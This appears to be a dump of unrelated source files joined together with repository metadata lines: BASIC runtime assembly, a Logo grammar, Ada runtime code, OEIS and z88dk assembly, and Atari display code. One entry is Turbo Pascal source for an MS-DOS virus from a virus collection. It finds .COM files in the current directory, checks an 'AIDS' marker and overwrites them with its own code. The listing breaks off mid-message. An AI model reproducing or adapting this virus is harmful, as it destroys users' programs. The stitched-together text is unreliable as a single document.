0x0f, 0xfe, 0xff, 0x02, 0xf0, 0xf0, 0x0f, 0xf9, 0xff, 0x06, 0x0f, 0xff, 0xf0, 0x00, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xee, 0x0f, 0xfe, 0xff, 0xfc, 0x0f, 0x03, 0x00, 0x0f, 0x00, 0xf0, 0xfe, 0xff, 0x02, 0xf0, 0x00, 0x00, 0xfe, 0xff, 0x06, 0x0f, 0xf0, 0x07, 0x07, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xe7, 0x0f, 0xfe, 0xff, 0xfd, 0x0f, 0x01, 0xf0, 0xff, 0xfe, 0xf0, 0xfd, 0xff, 0x01, 0x00, 0x0f, 0xfe, 0xff, 0x06, 0x0f, 0x0f, 0x00, 0x00, 0xf0, 0x0f, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xee, 0x0f, 0xfe, 0xff, 0xfd, 0x0f, 0x0e, 0xff, 0x00, 0x0f, 0xf0, 0xf0, 0xff, 0xff, 0x00, 0x0f, 0xf0, 0xff, 0x00, 0x0f, 0xff, 0x0f, 0xfd, 0x00, 0x01, 0x0f, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xe7, 0x0f, 0xfe, 0xff, 0xfd, 0x0f, 0x08, 0xff, 0xff, 0x0f, 0xf0, 0xf0, 0xff, 0xf0, 0xf0, 0x00, 0xfe, 0xf0, 0x02, 0x00, 0xff, 0x0f, 0xfd, 0x00, 0x01, 0x0f, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xee, 0x0f, 0xfe, 0xff, 0xfd, 0x0f, 0x06, 0xff, 0xff, 0x0f, 0xf0, 0xf0, 0xff, 0x0f, 0xfe, 0x00, 0x0a, 0x0f, 0x00, 0x00, 0x0f, 0x0f, 0xf0, 0x7f, 0x00, 0x70, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xe7, 0x0f, 0xfe, 0xff, 0xfd, 0x0f, 0x05, 0xff, 0xf0, 0xff, 0xf0, 0xf0, 0xff, 0xfa, 0x00, 0x07, 0x0f, 0x0f, 0xff, 0x00, 0x00, 0x0f, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xee, 0x0f, 0xfe, 0xff, 0xfd, 0x0f, 0x05, 0xf0, 0x00, 0xf0, 0x00, 0xf0, 0xff, 0xfa, 0x00, 0x07, 0x0f, 0x0f, 0xff, 0x00, 0x00, 0x0f, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xe7, 0x0f, 0xfe, 0xff, 0xfe, 0x0f, 0x15, 0x00, 0x00, 0xf0, 0x00, 0xf0, 0xf0, 0xff, 0xf0, 0x00, 0x00, 0xf0, 0xf0, 0x00, 0x00, 0xff, 0x0f, 0xff, 0xf0, 0x00, 0xff, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xee, 0x0f, 0xfe, 0xff, 0xfd, 0x0f, 0xfe, 0xff, 0x0b, 0xf0, 0xf0, 0xff, 0xff, 0x00, 0x0f, 0x00, 0x0f, 0x00, 0x0f, 0xff, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xe7, 0x0f, 0xfe, 0xff, 0xfd, 0xf0, 0xfe, 0xff, 0x01, 0xf0, 0xf0, 0xfe, 0xff, 0x02, 0xf0, 0xf0, 0x00, 0xfe, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xee, 0x0f, 0xfe, 0xff, 0x00, 0xf0, 0xfd, 0x0f, 0x03, 0xff, 0xff, 0x0f, 0x0f, 0xfe, 0xff, 0x0c, 0x0f, 0x00, 0x00, 0x0f, 0xff, 0xff, 0x00, 0x00, 0x0f, 0xf0, 0x00, 0x0f, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x01, 0xf0, 0xe0, 0xfd, 0xff, 0x00, 0xf0, 0xfa, 0x00, 0x00, 0x0f, 0xfe, 0xff, 0xfe, 0x00, 0x09, 0x0f, 0xff, 0xff, 0x00, 0x00, 0x0f, 0xf0, 0x00, 0x0f, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x01, 0xf0, 0xe0, 0xfd, 0xff, 0x00, 0x0c, 0xfa, 0xcc, 0x00, 0x0f, 0xfe, 0xff, 0xfe, 0x00, 0x09, 0x0f, 0xff, 0xff, 0x0f, 0x00, 0x0f, 0xff, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfd, 0xff, 0x00, 0x0c, 0xfa, 0xec, 0x00, 0x0f, 0xfe, 0xff, 0x02, 0xf0, 0x00, 0x00, 0xfe, 0xff, 0x06, 0x0f, 0xf0, 0x00, 0xff, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfe, 0xff, 0x09, 0xf0, 0xce, 0xee, 0xce, 0xee, 0xce, 0xee, 0xce, 0xee, 0xc0, 0xfd, 0xff, 0x01, 0x00, 0x0f, 0xfe, 0xff, 0x06, 0x0f, 0xff, 0x00, 0x0f, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x0f, 0xfe, 0xff, 0x09, 0xf0, 0xe0, 0xee, 0xee, 0x0e, 0xee, 0x0e, 0xee, 0xe0, 0xe0, 0xf8, 0xff, 0x06, 0x0f, 0xff, 0xf0, 0x00, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfc, 0xff, 0xfd, 0x00, 0x09, 0x0e, 0xe0, 0xee, 0xe0, 0x0e, 0xee, 0x00, 0xee, 0xe0, 0xee, 0xf8, 0x00, 0x06, 0x0f, 0xff, 0xff, 0x00, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xf8, 0xff, 0x07, 0x0e, 0x0f, 0x0e, 0x07, 0x70, 0xe0, 0x77, 0x0e, 0xfe, 0x07, 0x00, 0x7f, 0xf7, 0xff, 0x03, 0xf0, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xf8, 0xff, 0x0c, 0x00, 0x77, 0x70, 0x77, 0x77, 0x07, 0x77, 0x70, 0x77, 0x70, 0x07, 0x77, 0x7f, 0xf8, 0xff, 0x03, 0x00, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xf9, 0xff, 0x0c, 0xfc, 0x0f, 0xf7, 0x0c, 0x07, 0x70, 0xc0, 0x77, 0x0c, 0x07, 0x77, 0x0c, 0xf7, 0xf8, 0xff, 0x04, 0xf0, 0x00, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xf8, 0xff, 0x0b, 0x0f, 0xf7, 0x70, 0xff, 0x7f, 0x0f, 0xf7, 0xf0, 0xff, 0x7f, 0x0f, 0x77, 0xf8, 0xff, 0x04, 0x00, 0x0f, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xf7, 0xff, 0x0b, 0x77, 0xff, 0xf7, 0x77, 0xff, 0x77, 0x7f, 0xf7, 0x77, 0xff, 0xf7, 0x7f, 0xfa, 0xff, 0x05, 0xf0, 0x00, 0xff, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xf7, 0xff, 0x0a, 0xf7, 0xff, 0xff, 0x7f, 0xff, 0xf7, 0xff, 0xff, 0x7f, 0xff, 0xf7, 0xf9, 0xff, 0x05, 0x00, 0x0f, 0xff, 0x00, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xe5, 0xff, 0x06, 0xf0, 0x00, 0x0f, 0xf0, 0x00, 0x0f, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xe5, 0xff, 0x06, 0xf0, 0x00, 0x0f, 0xf0, 0x00, 0x0f, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xdf, 0xff, 0x00, 0x00 db 0x00, 0x7f, 0xfa, 0xff, 0x00, 0xfc db 0x00, 0xd0, 0xe0, 0xff, 0x01, 0xf0, 0xd0 db 0x00, 0x7f, 0xfa, 0xff, 0x00, 0xfc db 0x01, 0xd0, 0x0f, 0xe1, 0xff, 0x01, 0x00, 0xd0 db 0x00, 0x1f, 0xfa, 0xff, 0x00, 0xf0 db 0x01, 0xdd, 0xd0, 0xe1, 0x00, 0x01, 0xdd, 0xd0

45/runtime/rt/stringfp.asm

minblock/msdos

0

18334

TITLE STRINGFP - Floating Point String Functions PAGE 56,132 ;*** ; STRINGFP - Floating Point ST$ functions ; ; Copyright <C> 1986, Microsoft Corporation ; ;Purpose: ; ; BASIC Syntax mapping to included runtime entry points: ; ; ; - STR$ Function - ; ; v$ = STR$(x) ; ; Examples: ; ; v$ = STR$(b@) v$ = STR$(a!) v$ = STR$(x#) ; | | | ; B$STCY B$STR4 B$STR8 ; ; ;**** INCLUDE switch.inc INCLUDE rmacros.inc useSeg _DATA USESEG _BSS useSeg ST_TEXT INCLUDE seg.inc INCLUDE rtps.inc INCLUDE baslibma.inc sBegin ST_TEXT ASSUMES CS,ST_TEXT externNP B$FloatCONASC ;Pull in floating point conversion routines externNP B$STR_COMMON ;Common support for STR$ SUBTTL STR$ - Create String from number PAGE ;*** ;B$STR4, B$STR8, B$STCY - STR$ function support ; ;Purpose: ; Runtime Entry Points ; Create a string representing the number in ASCII ; ;Entry: ; parameter value is on the stack (R4, R8 or CY) ; ;Exit: ; AX = Address of string descriptor ; ;Uses: ; Per Convention ; ;Exceptions: ; Out of memory ;**** cProc B$STR4,<PUBLIC,FAR> parmD arg4 cBegin MOV AL,VT_R4 LEA BX,arg4 cCall B$STR_COMMON cEnd cProc B$STR8,<PUBLIC,FAR> ParmQ R8Arg cBegin MOV AL,VT_R8 ;AL = data type LEA BX,R8Arg ;BX = ptr to data cCall B$STR_COMMON ;call common routine to convert cEnd sEND ST_TEXT END

src/main/java/org/tros/logo/antlr/Logo.g4

ZenHarbinger/torgo

8

5337

/* BSD License Copyright (c) 2013, <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of <NAME> nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ grammar Logo; @parser::header { package org.tros.logo.antlr; } @lexer::header { package org.tros.logo.antlr; } /**--Added lone line detection--**/ prog : line | (line? EOL)+ line? ; /**--Added EOL--**/ line : cmd+ comment? | comment | print_command comment? | procedureDeclaration | EOL ; cmd : repeat | fd | bk | rt | lt | cs | pu | pd | ht | st | home | setxy | make | localmake | procedureInvocation | ife | stop | fore | pc | cc | pause | ds | fontsize | fontstyle | fontname /*-- print_command was not originally here, so could not print_command in if/repeat blocks--*/ | print_command ; procedureInvocation : name expression* ; procedureDeclaration : 'to' name parameterDeclarations* EOL? (line? EOL)+ 'end' ; parameterDeclarations : ':' name (',' parameterDeclarations)* ; func : random | repcount | getangle | getx | gety ; /*--made it so that repeating can use an expression--*/ repeat : 'repeat' expression block ; /*--Would like to make this be multi-line--*/ block : '[' line+ ']' ; ife : 'if' comparison block ; comparison : expression comparisonOperator expression ; /*--added more compare operators--*/ comparisonOperator : '<' | '>' | '=' | '!' | '<=' | '>=' | '==' | '!=' | '<>' ; make : 'make' STRINGLITERAL value ; localmake : 'localmake' STRINGLITERAL value ; print_command : 'print' (value | quotedstring) ; quotedstring : '[' (quotedstring | ~']')* ']' ; name : STRING ; /*--expression also contains deref, so deref here is unnecessary--*/ value : STRINGLITERAL | expression | deref ; /**--Added parenthesis for better order of operations control--**/ parenExpression : '(' expression ')' ; signExpression : ('+'|'-')? (number | deref | func | parenExpression) ; /**--Added Power/Exponential Expression--**/ powerExpression : signExpression ('^' signExpression)? ; /**--Added Integer Divsion Symbol and Modulo--**/ multiplyingExpression : powerExpression (('*' | '/' | '\\' | '%') powerExpression)* ; expression : multiplyingExpression (('+'|'-') multiplyingExpression)* ; deref : ':' name ; fd : ('fd' | 'forward') expression ; bk : ('bk' | 'backward' | 'back') expression ; rt : ('rt' | 'right') expression ; lt : ('lt' | 'left') expression ; cs : 'cs' | 'clearscreen' | 'cls' | 'clear' ; pu : 'pu' | 'penup' ; pd : 'pd' | 'pendown' ; ht : 'ht' | 'hideturtle' ; st : 'st' | 'showturtle' ; home : 'home' ; stop : 'stop' ; setxy : 'setxy' expression expression ; random : 'random' expression ; getangle : 'getangle' ; getx : 'getx' ; gety : 'gety' ; /**--This value will tell you which repeat value you are on inside the innermost repeat loop.--**/ /**--This value starts at 1.--**/ /**--If you are not in a repeat loop, it will evaluate to 0.--**/ repcount : 'repcount' ; /* --modified to make the step optional-- */ fore : 'for' '[' name expression expression expression? ']' block ; /* --custom-- */ /* --change pen color-- */ pc : ('pc' | 'pencolor') (name | expression expression expression expression? | hexcolor) ; /* --change canvas color-- */ cc : ('cc' | 'canvascolor') (name | expression expression expression | hexcolor) ; hexcolor : '#'HEX ; HEX : [0-9a-fA-F][0-9a-fA-F][0-9a-fA-F][0-9a-fA-F][0-9a-fA-F][0-9a-fA-F] ; /* --pause-- */ pause : 'pause' expression ; /* --draw a string to the canvas-- */ ds : ('ds'|'drawstring' | 'label') value ; fontname : 'fontname' name ; fontsize : 'fontsize' expression ; fontstyle : 'fontstyle' style ; style : 'bold' | 'plain' | 'italic' | 'bold_italic' ; number : NUMBER ; comment : COMMENT ; STRINGLITERAL : '"' STRING ; STRING : [a-zA-Z] [a-zA-Z0-9_]* ; NUMBER : [0-9]+ ('.'[0-9]+)? ; COMMENT : ';' ~[\r\n]* ; EOL : '\r'? '\n' ; WS : [ \t\r\n]->skip ;

test/high_low_xmm.asm

killvxk/AssemblyLine

147

15357

SECTION .TEXT GLOBAL TEST TEST: mov r9, 0x11111111 mov r10, 0x22222222 movq xmm0, r9 movq xmm1, r10 punpcklqdq xmm0, xmm1 psrldq xmm0, 8 psrldq xmm15, 8 movq rax, xmm0 ret

MSDOS/Virus.MSDOS.Unknown.vir2.asm

fengjixuchui/Family

3

29320

{ Beginning of source code, Turbo Pascal 3.01a } {C-} {U-} {I-} { Wont allow a user break, enable IO check } { -- Constants --------------------------------------- } Const VirusSize = 13847; { AIDSYs code size } Warning :String[42] { Warning message } = ZThis File Has Been Infected By AIDS! HaHa!Y; { -- Type declarations------------------------------------- } Type DTARec =Record { Data area for file search } DOSnext :Array[1..21] of Byte; Attr : Byte; Ftime, FDate, FLsize, FHsize : Integer; FullName: Array[1..13] of Char; End; Registers = Record {Register set used for file search } Case Byte of 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); End; { -- Variables--------------------------------------------- } Var { Memory offset program code } ProgramStart : Byte absolute Cseg:$100; { Infected marker } MarkInfected : String[42] absolute Cseg:$180; Reg : Registers; { Register set } DTA : DTARec; { Data area } Buffer : Array[Byte] of Byte; { Data buffer } TestID : String[42]; { To recognize infected files } UsePath : String[66]; { Path to search files } { Lenght of search path } UsePathLenght: Byte absolute UsePath; Go : File; { File to infect } B : Byte; { Used } LoopVar : Integer; {Will loop forever} { -- Program code------------------------------------------ } Begin GetDir(0, UsePath); { get current directory } if Pos(Z\Y, UsePath) <> UsePathLenght then UsePath := UsePath + Z\Y; UsePath := UsePath + Z*.COMY; { Define search mask } Reg.AH := $1A; { Set data area } Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } Reg.AH := $4E; Reg.DS := Seg(UsePath); Reg.DX := Ofs(UsePath[1]); Reg.CX := $ff; { Set attribute to find ALL files } MsDos(Reg); { Find first matching entry } IF not Odd(Reg.Flags) Then { If a file found then } Repeat UsePath := DTA.FullName; B := Pos(#0, UsePath); If B > 0 then Delete(UsePath, B, 255); { Remove garbage } Assign(Go, UsePath); Reset(Go); If IOresult = 0 Then { If not IO error then } Begin BlockRead(Go, Buffer, 2); Move(Buffer[$80], TestID, 43); { Test if file already ill(Infected) } If TestID <> Warning Then { If not then ... } Begin Seek (Go, 0); { Mark file as infected and .. } MarkInfected := Warning; { Infect it } BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); Close(Go); Halt; {.. and halt the program } End; Close(Go); End; { The file has already been infected, search next. } Reg.AH := $4F; Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); { ......................Until no more files are found } Until Odd(Reg.Flags); Loopvar:=Random(10); If Loopvar=7 then begin Writeln(Z Y); {Give a lot of smiles} Writeln(ZY); Writeln(Z Y); Writeln(Z ATTENTION: Y); Writeln(Z I have been elected to inform you that throughout your process of Y); Writeln(Z collecting and executing files, you have accidentally H

source/asis/spec/ada-command_line.ads

faelys/gela-asis

4

21082

<filename>source/asis/spec/ada-command_line.ads<gh_stars>1-10 ------------------------------------------------------------------------------ -- A d a r u n - t i m e s p e c i f i c a t i o n -- -- ASIS implementation for Gela project, a portable Ada compiler -- -- http://gela.ada-ru.org -- -- - - - - - - - - - - - - - - - -- -- Read copyright and license at the end of ada.ads file -- ------------------------------------------------------------------------------ -- $Revision: 209 $ $Date: 2013-11-30 21:03:24 +0200 (Сб., 30 нояб. 2013) $ package Ada.Command_Line is pragma Preelaborate (Command_Line); function Argument_Count return Natural; function Argument (Number : in Positive) return String; function Command_Name return String; type Exit_Status is range implementation-defined .. implementation-defined; Success : constant Exit_Status; Failure : constant Exit_Status; procedure Set_Exit_Status (Code : in Exit_Status); private pragma Import (Ada, Success); pragma Import (Ada, Failure); end Ada.Command_Line;

Validation/pyFrame3DD-master/gcc-master/gcc/ada/libgnarl/s-mudido.adb

djamal2727/Main-Bearing-Analytical-Model

0

16210

------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME COMPONENTS -- -- -- -- SYSTEM.MULTIPROCESSORS.DISPATCHING_DOMAINS -- -- -- -- B o d y -- -- -- -- Copyright (C) 2011-2020, Free Software Foundation, Inc. -- -- -- -- GNARL is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- As a special exception under Section 7 of GPL version 3, you are granted -- -- additional permissions described in the GCC Runtime Library Exception, -- -- version 3.1, as published by the Free Software Foundation. -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNARL was developed by the GNARL team at Florida State University. -- -- Extensive contributions were provided by Ada Core Technologies, Inc. -- -- -- ------------------------------------------------------------------------------ -- Body used on unimplemented targets, where the operating system does not -- support setting task affinities. package body System.Multiprocessors.Dispatching_Domains is ----------------------- -- Local subprograms -- ----------------------- procedure Freeze_Dispatching_Domains; pragma Export (Ada, Freeze_Dispatching_Domains, "__gnat_freeze_dispatching_domains"); -- Signal the time when no new dispatching domains can be created. It -- should be called before the environment task calls the main procedure -- (and after the elaboration code), so the binder-generated file needs to -- import and call this procedure. ----------------- -- Assign_Task -- ----------------- procedure Assign_Task (Domain : in out Dispatching_Domain; CPU : CPU_Range := Not_A_Specific_CPU; T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) is pragma Unreferenced (Domain, CPU, T); begin raise Dispatching_Domain_Error with "dispatching domains not supported"; end Assign_Task; ------------ -- Create -- ------------ function Create (First : CPU; Last : CPU_Range) return Dispatching_Domain is pragma Unreferenced (First, Last); begin return raise Dispatching_Domain_Error with "dispatching domains not supported"; end Create; function Create (Set : CPU_Set) return Dispatching_Domain is pragma Unreferenced (Set); begin return raise Dispatching_Domain_Error with "dispatching domains not supported"; end Create; ----------------------------- -- Delay_Until_And_Set_CPU -- ----------------------------- procedure Delay_Until_And_Set_CPU (Delay_Until_Time : Ada.Real_Time.Time; CPU : CPU_Range) is pragma Unreferenced (Delay_Until_Time, CPU); begin raise Dispatching_Domain_Error with "dispatching domains not supported"; end Delay_Until_And_Set_CPU; -------------------------------- -- Freeze_Dispatching_Domains -- -------------------------------- procedure Freeze_Dispatching_Domains is begin null; end Freeze_Dispatching_Domains; ------------- -- Get_CPU -- ------------- function Get_CPU (T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) return CPU_Range is pragma Unreferenced (T); begin return Not_A_Specific_CPU; end Get_CPU; ----------------- -- Get_CPU_Set -- ----------------- function Get_CPU_Set (Domain : Dispatching_Domain) return CPU_Set is pragma Unreferenced (Domain); begin return raise Dispatching_Domain_Error with "dispatching domains not supported"; end Get_CPU_Set; ---------------------------- -- Get_Dispatching_Domain -- ---------------------------- function Get_Dispatching_Domain (T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) return Dispatching_Domain is pragma Unreferenced (T); begin return System_Dispatching_Domain; end Get_Dispatching_Domain; ------------------- -- Get_First_CPU -- ------------------- function Get_First_CPU (Domain : Dispatching_Domain) return CPU is pragma Unreferenced (Domain); begin return CPU'First; end Get_First_CPU; ------------------ -- Get_Last_CPU -- ------------------ function Get_Last_CPU (Domain : Dispatching_Domain) return CPU_Range is pragma Unreferenced (Domain); begin return Number_Of_CPUs; end Get_Last_CPU; ------------- -- Set_CPU -- ------------- procedure Set_CPU (CPU : CPU_Range; T : Ada.Task_Identification.Task_Id := Ada.Task_Identification.Current_Task) is pragma Unreferenced (CPU, T); begin raise Dispatching_Domain_Error with "dispatching domains not supported"; end Set_CPU; end System.Multiprocessors.Dispatching_Domains;

programs/oeis/063/A063102.asm

karttu/loda

1

100221

; A063102: Dimension of the space of weight 2n cusp forms for Gamma_0( 34 ). ; 3,12,20,30,38,48,56,66,74,84,92,102,110,120,128,138,146,156,164,174,182,192,200,210,218,228,236,246,254,264,272,282,290,300,308,318,326,336,344,354,362,372,380,390,398,408,416,426,434,444 mul $0,9 add $0,1 div $0,2 mov $1,1 sub $1,$0 trn $0,$1 mov $1,$0 add $1,3

libsrc/_DEVELOPMENT/math/integer/small/l_small_mul_72_64x8.asm

jpoikela/z88dk

640

9060

SECTION code_clib SECTION code_math PUBLIC l_small_mul_72_64x8 EXTERN l_small_mul_40_32x8 l_small_mul_72_64x8: ; multiplication of a 64-bit number and an 8-bit number into 72-bit result ; ; enter : dehl'dehl = 64-bit multiplicand ; a = 8-bit multiplicand ; ; exit : a dehl'dehl = 72-bit product ; carry reset ; ; uses : af, bc, de, hl, bc', de', hl' exx push de push hl ; save MS32 push af ; save M8 exx call l_small_mul_40_32x8 ; adehl = LS32 * M8 ld c,a ld b,0 exx pop af ; a = M8 pop hl pop de ; dehl = MS32 exx push de push hl push bc ; save LS32 * M8 exx call l_small_mul_40_32x8 ; adehl = MS32 * M8 pop bc add hl,bc jr nc, no_propagate inc e jr nz, no_propagate inc d jr nz, no_propagate inc a no_propagate: exx pop hl pop de ; a dehl'dehl = 72-bit product or a ret

src/drawCode/mmRender.asm

Gip-Gip/VePseu

5

9545

<reponame>Gip-Gip/VePseu ; Render the minimap mmRender: SUBROUTINE LDA #NULL ; Set the colour of the player LDA #PLYRCOLU STA COLUPF ; Set the colour of the map LDA #MAPCOLU STA COLUP0 STA COLUP1 ; Get the player's position and translate it into horizontal movement LDA #%00001000 CLC SEC SBC playerPos ASL ASL ASL ASL STA HMBL ; Set the map's position to the right values LDA #HADJ_A STA HMP0 LDA #HADJ_B STA HMP1 STA WSYNC LDX #HWAIT .wait1: DEX BNE .wait1 DELAY HDELAY1 STA RESP0 STA RESP1 LDA playerPos STA WSYNC LDX #HWAIT .wait2: DEX BNE .wait2 DELAY HDELAY2 STA RESBL